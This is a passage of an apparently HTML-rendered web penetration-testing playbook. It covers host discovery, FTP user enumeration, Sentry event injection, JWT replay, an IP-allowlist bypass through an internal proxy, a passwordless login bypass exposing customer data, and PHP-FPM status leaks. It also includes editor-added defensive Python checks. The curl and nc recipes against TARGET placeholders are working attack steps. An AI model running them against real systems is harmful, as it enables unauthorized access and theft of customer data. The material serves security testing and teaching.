&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Wildcard DNS = try service names to discover hidden hosts&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;services&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;api chat ws whatsapp painel intranet crm nfe backup monitor zabbix grafana storage vpn n8n supabase jenkins gitlab registry&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; svc in &lt;span style="color:#f2d5cf"&gt;$services&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;ip&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;dig +short &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$svc&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.TARGET.com&amp;#34;&lt;/span&gt; | head -1&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; -n &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$ip&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$svc&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.TARGET.com → &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$ip&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2521-ftp-user-enumeration-via-timing" &gt;
&lt;div&gt;
&lt;a href="#2521-ftp-user-enumeration-via-timing"&gt;
##
&lt;/a&gt;
25.21 FTP User Enumeration via Timing
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Identify valid users by response difference&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;users&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;admin sistemas egb root backup operator ftp upload download web www-data mysql postgres&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; user in &lt;span style="color:#f2d5cf"&gt;$users&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;USER &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$user&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; | timeout &lt;span style="color:#ef9f76"&gt;2&lt;/span&gt; nc -w1 FTP_HOST &lt;span style="color:#ef9f76"&gt;21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; sleep 0.5
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;331 User OK. Password required&amp;#34; → VALID user&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# &amp;#34;530 Invalid user&amp;#34; → does NOT exist&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2522-varnish-cache--extreme-ttl-32-days" &gt;
&lt;div&gt;
&lt;a href="#2522-varnish-cache--extreme-ttl-32-days"&gt;
##
&lt;/a&gt;
25.22 Varnish Cache — Extreme TTL (32 days!)
&lt;/div&gt;
&lt;/h3&gt;
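&lt;p&gt;Audit logic for the cache headers this section reads off with &lt;code&gt;curl -sI&lt;/code&gt;: an added example (editor's code, not from the playbook) that parses a response head, converts &lt;code&gt;max-age&lt;/code&gt; and &lt;code&gt;Age&lt;/code&gt; into days and hours, and flags the combinations that make web cache deception or poisoning durable: a TTL far beyond a day, and a response that sets a cookie while remaining storable by shared caches with no &lt;code&gt;Vary&lt;/code&gt;. The header sample is constructed from the numbers in this section; the one-day threshold is an assumption.&lt;/p&gt;

```python
# Constructed response headers (as curl -sI would print them), not a real capture.
SAMPLE_HEADERS = """\
HTTP/2 200
content-type: text/html; charset=utf-8
cache-control: public, max-age=2764800
age: 79550
x-cache: HIT
set-cookie: sessao=abc123; Path=/; HttpOnly
"""

MAX_SENSIBLE_TTL = 24 * 3600  # assumption: anything above a day deserves review


def parse_headers(raw: str) -> dict:
    """Lower-cased header name -> list of values; the status line is dropped."""
    headers = {}
    for line in raw.splitlines()[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers


def cache_directives(cc: str) -> dict:
    """'public, max-age=2764800' -> {'public': True, 'max-age': 2764800}."""
    out = {}
    for token in cc.split(","):
        token = token.strip().lower()
        if not token:
            continue
        key, _, val = token.partition("=")
        out[key] = int(val) if val.isdigit() else True
    return out


def audit_cache(raw: str) -> list:
    """Return findings about how long and how widely this response is cached."""
    h = parse_headers(raw)
    cc = cache_directives(", ".join(h.get("cache-control", [])))
    findings = []
    # Shared caches prefer s-maxage over max-age when both are present.
    max_age = cc.get("s-maxage", cc.get("max-age"))
    if isinstance(max_age, int) and max_age > MAX_SENSIBLE_TTL:
        findings.append("max-age=%d (%.1f days): a poisoned or deceptive entry lives that long"
                        % (max_age, max_age / 86400))
    age = h.get("age", ["0"])[0]
    if age.isdigit() and int(age) > 3600:
        findings.append("age: %s (%.1f hours) already served from a shared cache"
                        % (age, int(age) / 3600))
    shared = "public" in cc or ("private" not in cc and "no-store" not in cc)
    if "set-cookie" in h and shared:
        findings.append("response sets a cookie but is storable by shared caches: "
                        "add Cache-Control: private or no-store")
    if "set-cookie" in h and "vary" not in h:
        findings.append("no Vary header: one cached copy is served regardless of Cookie")
    return findings


if __name__ == "__main__":
    for f in audit_cache(SAMPLE_HEADERS):
        print("-", f)
```

Feed it the raw output of `curl -sI` against your own endpoints; a clean result for an authenticated page is an empty list.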
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;https://TARGET/&amp;#34;&lt;/span&gt; | grep -iE &lt;span style="color:#a6d189"&gt;&amp;#34;age:|max-age|x-cache&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Age: 79550 (22 hours!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# max-age: 2764800 (32 DAYS!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Over 32 days, any WCD/WCP persists for an entire month&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2523-sentry-dsn--fake-event-injection" &gt;
&lt;div&gt;
&lt;a href="#2523-sentry-dsn--fake-event-injection"&gt;
##
&lt;/a&gt;
25.23 Sentry DSN — Fake Event Injection
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Sentry DSN found in JS bundle: https://{key}@sentry.TARGET.com/{project_id}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test if it accepts ingestion (write-only DSN)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;https://{DSN_KEY}@sentry.TARGET.com/api/{project_id}/store/&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;message&amp;#34;:&amp;#34;test&amp;#34;,&amp;#34;level&amp;#34;:&amp;#34;info&amp;#34;,&amp;#34;logger&amp;#34;:&amp;#34;research&amp;#34;}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# 200 OK → can inject fake events, cause alert fatigue&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Does NOT allow reading existing events (write-only)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="2524-hardcoded-jwts-as-app-tokens" &gt;
&lt;div&gt;
&lt;a href="#2524-hardcoded-jwts-as-app-tokens"&gt;
##
&lt;/a&gt;
25.24 Hardcoded JWTs as &amp;ldquo;App Tokens&amp;rdquo;
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;JWTs found in JS bundles may not need forgery — just reuse them:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-javascript" data-lang="javascript"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Example: found in JS bundle
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;const&lt;/span&gt; BOT_JWT &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0...&amp;#34;&lt;/span&gt;;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// Usage: send as authentication header
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// The server blindly trusts this token to identify the application
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Replay the found JWT&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://API.TARGET.com/bff-api/stores&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;X-App-Id: bot&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;X-App-Token: eyJhbGciOiJIUzI1NiIs...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Real-world case&lt;/strong&gt;: Delivery platform — 2 HS256 JWTs hardcoded (&lt;code&gt;appName: bot&lt;/code&gt;, &lt;code&gt;appName: dashboard&lt;/code&gt;), used as &amp;ldquo;app tokens&amp;rdquo; to authenticate BFF API requests. The server blindly trusted them.&lt;/p&gt;
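&lt;p&gt;Build-time check for the two leaks in 25.23 and this section: an added example (editor's code, not from the playbook or the delivery platform) that scans a built JS bundle for Sentry-style DSNs and for JWT-shaped strings, decoding each JWT's header and payload without verifying the signature so the report shows the algorithm and claims (such as &lt;code&gt;appName&lt;/code&gt;) that tell you what the token is for. The bundle text, the DSN and the JWT are constructed; the two regexes are assumptions about the formats, not Sentry's or any library's own.&lt;/p&gt;

```python
import base64
import json
import re


def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


# Constructed HS256 "app token" with a fake signature (no real key involved).
_SAMPLE_JWT = ".".join([
    _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}).encode()),
    _b64url(json.dumps({"sub": "1234", "appName": "bot"}).encode()),
    _b64url(b"not-a-real-signature"),
])

# Constructed bundle fragment embedding a DSN and the token above.
SAMPLE_BUNDLE = (
    'Sentry.init({dsn:"https://0123456789abcdef0123456789abcdef@sentry.example.test/42"});'
    'const BOT_JWT="' + _SAMPLE_JWT + '";'
    'fetch("/bff-api/stores",{headers:{"X-App-Id":"bot","X-App-Token":BOT_JWT}});'
)

# Assumed shapes: a DSN is a URL with a key before '@' and a numeric project id;
# a JWT is three base64url segments, the first of which encodes '{"' (so "eyJ").
DSN_RE = re.compile(r"https?://[A-Za-z0-9]+@[A-Za-z0-9.\-]+(?::\d+)?/\d+")
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+\.[A-Za-z0-9_\-]+")


def _decode_segment(seg: str) -> dict:
    padded = seg + "=" * (-len(seg) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def scan_bundle(text: str) -> list:
    """Findings for DSNs and JWTs in built JS. JWT header and payload are decoded
    without verification, only to report alg and claims."""
    findings = []
    for dsn in DSN_RE.findall(text):
        findings.append({"kind": "sentry_dsn", "value": dsn,
                         "risk": "public ingest key: fake events and alert fatigue"})
    for token in JWT_RE.findall(text):
        header_seg, payload_seg, _sig = token.split(".")
        try:
            header = _decode_segment(header_seg)
            payload = _decode_segment(payload_seg)
        except (ValueError, json.JSONDecodeError):
            continue  # base64url-looking string that is not a JWT
        findings.append({"kind": "jwt", "alg": header.get("alg"), "claims": payload,
                         "risk": "long-lived bearer credential shipped to every client"})
    return findings


if __name__ == "__main__":
    for finding in scan_bundle(SAMPLE_BUNDLE):
        print(finding)
```

Wire it into CI over the built assets directory: a DSN should at least be the project's public, rate-limited key, and a JWT in a bundle means the server must stop treating that token as proof of anything.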
&lt;hr&gt;
&lt;h2 id="26-advanced-techniques--part-2" &gt;
&lt;div&gt;
&lt;a href="#26-advanced-techniques--part-2"&gt;
#
&lt;/a&gt;
26. ADVANCED TECHNIQUES — PART 2
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="261-ip-whitelist-bypass-via-internal-proxy-ssrf" &gt;
&lt;div&gt;
&lt;a href="#261-ip-whitelist-bypass-via-internal-proxy-ssrf"&gt;
##
&lt;/a&gt;
26.1 IP Whitelist Bypass via Internal Proxy SSRF
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;When an API is protected by IP whitelist but there&amp;rsquo;s an internal proxy running on the server:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Direct call → blocked by the IP whitelist:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://api.TARGET.com/webservice/v1/cliente&amp;#34;&lt;/span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Authorization: Basic ...&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → &amp;#34;Your IP is not authorized to log in!&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Bypass via internal proxy (the server&amp;#39;s IP IS on the whitelist):&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET_IP:8085/proxy-ixc.php&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;action&amp;#34;:&amp;#34;listar&amp;#34;,&amp;#34;tabela&amp;#34;:&amp;#34;cliente&amp;#34;,&amp;#34;limit&amp;#34;:100}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Flow: Your IP ──✅──&amp;gt; proxy.php (on the server) ──✅──&amp;gt; API (server&amp;#39;s IP on the whitelist)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Look for PHP proxies on alternative ports (8085, 8080, 3000, 5000) with endpoints like &lt;code&gt;/proxy.php&lt;/code&gt;, &lt;code&gt;/api-proxy/&lt;/code&gt;, &lt;code&gt;/forward&lt;/code&gt;.&lt;/p&gt;
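&lt;p&gt;What the forwarding endpoint should have enforced, as an added example (editor's code in Python, not the PHP proxy from the case): the API's IP allowlist cannot tell the proxy's own callers apart, so the proxy must restrict who may call it, require its own credential, pin the upstream to an explicit allowlist instead of forwarding anywhere, and pass the real caller on so the upstream can log and filter on it. Networks, hostnames and the token comparison are constructed assumptions.&lt;/p&gt;

```python
import hmac
import ipaddress
from urllib.parse import urlsplit

# Hypothetical policy for an internal forwarding endpoint; values are assumptions.
ALLOWED_UPSTREAM_HOSTS = {"api.example.test"}
ALLOWED_SCHEMES = {"https"}
TRUSTED_CLIENT_NETWORKS = [ipaddress.ip_network("10.20.0.0/16"),
                           ipaddress.ip_network("127.0.0.0/8")]


def authorize_forward(client_ip: str, target_url: str, api_token: str,
                      expected_token: str) -> tuple:
    """Decide whether the proxy may forward a request.
    Returns (allowed, reason, headers_to_add)."""
    # 1. Caller must be on an internal network: an open proxy inherits the
    #    server's IP trust for anyone who can reach its port.
    try:
        addr = ipaddress.ip_address(client_ip)
    except ValueError:
        return (False, "unparseable client address", {})
    if not any(addr in net for net in TRUSTED_CLIENT_NETWORKS):
        return (False, "client network not trusted", {})
    # 2. Caller must authenticate to the proxy itself, not only to the upstream.
    if not hmac.compare_digest(api_token, expected_token):
        return (False, "proxy credential invalid", {})
    # 3. Upstream must be on an explicit allowlist (no forwarding to arbitrary hosts).
    parts = urlsplit(target_url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return (False, "scheme not allowed", {})
    if parts.hostname not in ALLOWED_UPSTREAM_HOSTS:
        return (False, "upstream host not allowed", {})
    # 4. Preserve the real caller so the upstream can apply its own policy and logging.
    return (True, "ok", {"X-Forwarded-For": client_ip})


if __name__ == "__main__":
    print(authorize_forward("10.20.3.4", "https://api.example.test/webservice/v1/cliente",
                            "tok", "tok"))
    print(authorize_forward("203.0.113.9", "https://api.example.test/x", "tok", "tok"))
```

The same four checks apply whatever language the proxy is written in; a proxy that is reachable from outside and skips any of them turns the server's allowlisted IP into a public one.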
&lt;h3 id="262-login-without-password-validation-action-based-routing" &gt;
&lt;div&gt;
&lt;a href="#262-login-without-password-validation-action-based-routing"&gt;
##
&lt;/a&gt;
26.2 Login Without Password Validation (Action-Based Routing)
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;PHP systems that use the &lt;code&gt;ACTION&lt;/code&gt; parameter to route functions may skip password validation:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# NORMAL login: ACTION=login → validates user + password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# BYPASS login: ACTION=getValidaLogin → ONLY validates whether the CPF/USER exists&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#39;https://TARGET.com/central_assinante_web/model/login/login.php&amp;#39;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;ACTION=getValidaLogin&amp;amp;USER=***.***.***-**&amp;amp;ID_CLIENTE=0&amp;amp;APP=N&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → {&amp;#34;tipo&amp;#34;:&amp;#34;sucesso&amp;#34;,&amp;#34;mensagem&amp;#34;:{&amp;#34;sessao&amp;#34;:&amp;#34;xxxxxxxx...&amp;#34;}}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Session returned without checking the password!&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Use the session cookie for protected endpoints:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#39;https://TARGET.com/.../faturas.php?ACTION=getFaturas&amp;amp;APP=N&amp;#39;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#39;Cookie: sessao=xxxxxxxx&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# → Full customer data&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;strong&gt;Pattern&lt;/strong&gt;: Look for &lt;code&gt;ACTION&lt;/code&gt;, &lt;code&gt;action&lt;/code&gt;, &lt;code&gt;method&lt;/code&gt;, &lt;code&gt;op&lt;/code&gt;, &lt;code&gt;do&lt;/code&gt; parameters in legacy PHP apps. Test values like &lt;code&gt;getValidaLogin&lt;/code&gt;, &lt;code&gt;validar&lt;/code&gt;, &lt;code&gt;auth&lt;/code&gt;, &lt;code&gt;checkUser&lt;/code&gt;, &lt;code&gt;getSession&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="263-php-fpm-status-page--real-time-intelligence" &gt;
&lt;div&gt;
&lt;a href="#263-php-fpm-status-page--real-time-intelligence"&gt;
##
&lt;/a&gt;
26.3 PHP-FPM Status Page — Real-Time Intelligence
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Requires the correct Host header and a browser User-Agent&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s -H &lt;span style="color:#a6d189"&gt;&amp;#34;Host: TARGET&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;http://TARGET_IP:80/status&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Returns IN REAL TIME:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - pool: www, process manager: dynamic&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - PID, state, start time, requests, request URI, request method&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - SCRIPT FILENAME: /var/www/ws/index.php (internal path!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - active/idle/total processes&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# - Content of the current request (POST bodies visible!)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
